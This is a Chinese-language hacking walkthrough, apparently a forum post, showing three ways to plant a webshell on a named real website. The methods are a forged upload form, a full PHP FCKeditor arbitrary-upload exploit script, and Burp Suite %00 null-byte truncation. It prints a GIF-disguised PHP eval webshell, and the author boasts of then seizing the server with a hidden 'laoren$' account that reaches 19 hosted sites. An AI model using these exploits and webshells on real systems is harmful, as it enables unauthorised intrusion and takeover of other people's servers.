一般有这个安全码的,都会比较难爆破。
第一种:本地构造上传表单。
用御剑扫描一下它的后台目录,图中看到了上传页面。
Filedata函数未变量。
写一份上传表单:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<html><head>
<title>上载文件表单</title></head>
<body>
<form enctype="multipart/form-data" action="" method="post">
请选择文件: <br>
<input name="upload_frle" type="file"><br>
<input type="submit" value="上传文件">
</form>
</body>
</html>
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
把以上保存为htm文件格式。
双击打开。
上传我们的图片一句话木马。
shell连接,拿下网站。
*************************************************************************************************************************************************************************
第二种方法:Fckeditor编辑器Getshell。
本次需要在PHP环境下运行。
http://www.****.net/ntbkwl/editor/editor/filemanager/ ; 响应403
http://www.****.net/ntbkwl/fckeditor/editor/fckeditor.html ; 响应200
经过测试,这个网站装有两个fckeditor编辑器。
响应200的是精简版的编辑器,没有什么可以利用的。
我们要针对的是响应403的这个目录。
把以下脚本保存为laoren.php
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
$match = array();
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
print $resp;
return $resp;
}
function connector_response($html)
{
global $match;
return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}
print "\n+------------------------------------------------------------------+";
print "\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ |";
print "\n+------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /\n";
print "\nExample....: php $argv[0] localhost /FCKEditor/\n";
die();
}
$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);
$filename = "laoren.gif";
$foldername = "laoren.php%00.gif";
$connector = "editor/filemanager/connectors/php/connector.php";
$payload = "-----------------------------265001916915724\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: image/jpeg\r\n\r\n";
$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[laoren]) ?>'."\n";
$payload .= "-----------------------------265001916915724--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";
//print $packet;
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
print $packet;
if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Job done! try http://${host}/$match[2] \n";
?>
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
这个脚本很简单,就是模拟一个POST数据包提交。
把这个脚本保存为laoren.php放到PHP环境中。
/ntbkwl/editor/ 这个是这个网站编辑器的目录。
getshell 执行成功会在 /Ntbkwl/uploadfile/image/ 这个目录下生成我们的一句话木马,命名为laoren.php
http://www.gytv.net//Ntbkwl/uploadfile/image/laoren.php ; 这个就是我们的一句话木马,密码为laoren
成功拿下这个网站的管理权限。
*************************************************************************************************************************************************************************
接下来是第三种方法,burpsuite %00截断。
这一种是针对手头上没有PHP环境上用的。
得到403的目录是 /ntbkwl/editor/
用到的工具是:Fckeidtor编辑漏洞利用工具
http://www.****.net/ntbkwl/editor//editor/filemanager/connectors/test.html
编辑器的上传页面。
用把以下代码保存为hk.jpg
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------GIF89a
<?php eval($_POST[laoren]);?>
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GIF89a这个是图片的头文件,一定要加上,达到图片欺骗上传。
把hk.jpg上传到网站上面。
开启浏览器的8080本地代理端口,用burpsuite的Proxy功能抓一下包。
把抓取到的数据包发送到Repeater中。
currentFolder=%2F
修改为
currentFolder=laoren.php%00
一定要加个%00,才能从这里截断。
点击GO一下。
/Ntbkwl/uploadfile/file/laoren.php
这个就是一句话木马的路径了。
访问一下。
http://www.***.net//Ntbkwl/uploadfile/file/laoren.php
可以访问。
成功拿下webshell。
*************************************************************************************************************************************************************************
OK,拿下了这网站。
接下来就是这台服务器。
看到这里,应该知道我是怎么拿下这台服务器的吧。
这是我建立的账号laoren$
这是服务器网站的目录,总共19个网站。
可以解析的到。
Q9300 酷睿2四核 。
4G内存。
OK。
